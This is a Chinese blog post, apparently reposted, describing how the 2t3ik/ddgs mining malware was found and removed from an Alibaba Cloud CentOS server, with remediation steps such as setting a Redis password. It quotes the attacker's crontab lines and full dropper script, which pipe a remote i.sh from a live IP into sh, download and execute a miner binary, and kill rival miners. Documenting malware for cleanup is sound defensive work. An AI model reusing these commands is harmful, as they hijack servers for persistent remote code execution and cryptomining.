阿里云centos上处理2t3ik与ddgs病毒
阿里云centos上处理2t3ik与ddgs病毒
有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示
系统centos
由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……
于是我就没有管它。
今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的问题呢,于是我还了putty登陆,还是一样,输入一个字母都卡半天,这就表明不是xshell的问题了,耐着性子输入top命令以查看,有个2t3ik.p的进程占用着99%多的CPU使用率,我赶紧把这个进程杀了,嗯,这下用着不卡了。
可是还没有等到半分钟,又开始一卡一卡的,继续使用top命令一看,还是这个2t3ik.p,只不过换了个PID
我也不知道这个进程是干什么的,可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉,于是我就百度搜索了这个进程,遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息
百度不行那我上阿里云官网看看有什么解决的办法,很遗憾,找不到,那我就谷歌吧,说起来还是谷歌好,虽然相关结果不多,也是让我找到线索处理这个2t3ik.p进程了,这个进程文件在/tmp目录下
于是把这个2t3ik.p文件删除,可是没过过一分钟又出现了这个文件,阿里云的管理台上提示出现异常文件文件下载
然后我吧这个文件删除掉,在新建一个2t3ik.p文件,不给权限,2t3ik.p进程是没有了,却又出现2t3ik.m这个进程
在/tmp文件夹下有2t3ik.m这个文件
想到过给/tmp文件夹添加不可修改的权限,觉得不大现实,因为以后这个文件夹会用到
那么把所有让所有以2t3ik开头的文件不给修改权限
使用命令
chattr +i 2t3ik*
chattr +i ddgs*
搞定,再也没有2t3ik的进程了
再也没有恼人的2t3ik病毒了
PS:阿里云的aliyundun真的不管用,对这个进程竟然防不了
PPS:阿里云对异常处理竟然还要升级企业版才能查看与一键处理,我一介屌丝哪来这个闲钱去升级啊
2t3ik与ddgs挖矿病毒处理
一、问题现象
朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。
二、分析处理
即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:
- */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
- */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:
- export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
- echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
- echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
- mkdir -p /var/spool/cron/crontabs
- echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
- echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
- if [ ! -f "/tmp/ddgs.3011" ]; then
- curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
- fi
- chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
- ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
- ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。
删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:
- cd /tmp/
- rm -rf 2t3ik.p
- rm -rf ddgs.3011
- touch 2t3ik.p
- touch ddgs.3011
- chattr +i 2t3ik*
- chattr +i ddgs*
三、产生原因
网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:
- redis-cli -h 127.0.0.1 -p 6379
- config get requirepass //获取当前密码
- config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;
永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:
- requirepass yourpassword //此处注意,行前不能有空格
另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。
阿里云centos上处理2t3ik与ddgs病毒相关推荐
- Linux学习总结(56)——如何处理阿里云服务器上入侵的kdevtmpfsi 挖矿病毒
1.首先停掉kdevtmpfsi的程序
- ecs php mysql集成环境_在阿里云 CentOS 服务器(ECS)上搭建 nginx + mysql + php-fpm 环境...
阿里云的云服务器(ECS)可以选择多种操作系统,打算用它运行 Drupal或者 WordPress ,你最好选择 Linux 系统,这篇文章的演示是基于阿里云的 CentOS 操作系统的服务器.我们在 ...
- nginx 在阿里云怎么安装mysql_在阿里云 CentOS 服务器(ECS)上搭建 nginx + mysql + php-fpm 环境...
阿里云的云服务器(ECS)可以选择多种操作系统,打算用它运行 Drupal或者 WordPress ,你最好选择 Linux 系统,这篇文章的演示是基于阿里云的 CentOS 操作系统的服务器.我们在 ...
- 阿里云centos环境之linux上redis安装及踩过的坑(七)
阿里云centos环境之linux上redis安装及踩过的坑<七> 文章目录 阿里云centos环境之linux上redis安装及踩过的坑<七> 第一:下载上传 第二:解压安装 ...
- 2021-08-15 minikube在阿里云centos系统上的安装实践
教程原文链接,我这里用阿里云服务器上的Centos8系统做一下教程.这里发现CPU必须两个核以上! 在ssh工具登录自己的阿里云服务器 我就直接用Pycharm连接了 安装docker docker以 ...
- 阿里云 centos oracle安装
Title: 阿里云CentOS7 Silent Mode安装Oracle11GR2 Date: 2016-6-9 Author: kagula Environment: [1]阿里云CentOS7- ...
- [Ops]阿里云服务器上无法发送邮件的现象原因及解决
1.阿里云服务器上无法发送邮件的现象 2.原因及解决 阿里云对ECS服务器的25号端口出现进行了封锁:如果希望发送邮件,需要申请解封,地址是:https://yundun.console.aliyun ...
- 阿里云centos服务器rdp远程桌面规则_阿里云服务器使用教程 新手用户的好帮手...
云服务器越来越成为企业及个人用户开展网络业务的首选了,阿里云服务器ECS因其起步较早,用户数量已经是国内第一,全球五强的大云服务商了.虽然阿里云对于用户来说很熟悉了,但阿里云服务器的使用方法,相信还有 ...
- 如何将nodejs项目程序部署到阿里云服务器上
将nodejs项目程序部署到阿里云服务器上 一.概述 二.具体步骤 1.拥有自己的服务器 2.下载Xshell 3. oneinstack配置web环境 4. XShell连接远程主机 5.更新系统软 ...
最新文章
- MBProgressHUD
- Updatepanel与Jquery合用时的问题解决
- 关于JQUERY动态加载页面时的JS失效的问题
- mysql 行转列分级输出_MySQL如何实现行转列分级输出?_MySQL
- raspberry pi_修改磁盘映像以创建基于Raspberry Pi的homelab
- Mac下安装MySQL(Mac 10.12)
- python 是否可以一键修图_ps如何快速批量修图?
- 【跃迁之路】【737天】程序员高效学习方法论探索系列(实验阶段494-2019.2.27)...
- iOS学习——Socket
- Zabbix Agent端配置文件说明
- grafana设置mysql为数据源,并进行可视化
- centos上nginx转发tcp请求
- 简单易懂之python 中的map,filter,reduce用法
- [python]设计模式
- 大数据采集技术和预处理技术
- 如何在浏览器播放amr格式的音频文件
- AM中使用PML语言标注船体结构
- armbian 安装python3
- 2021年全球天然橡胶行业供需现状分析:需求量迎来恢复性增长,中国市场需求量占比超40%[图]
- Bilibili 视频下载 Python 实现
热门文章
- golang 编译错误:unknown revision xxx
- c语言——简单计算器
- Linux(Ubuntu)系统如何安装Python
- v-text、v-html、v-cloak指令
- [原]删除dboy病毒
- RAM、SRAM、DRAM、SDRAM、DDRSDRAM等之间的区别
- drools dmn_Drools 7支持DMN(决策模型和表示法)
- 卸载 ibus 使Ubuntu16.04任务栏与桌面图标消失
- PSPICE中的各种库文件说明
- wangeditor: 上传图片+上传视频+上传附件(自定义)完整使用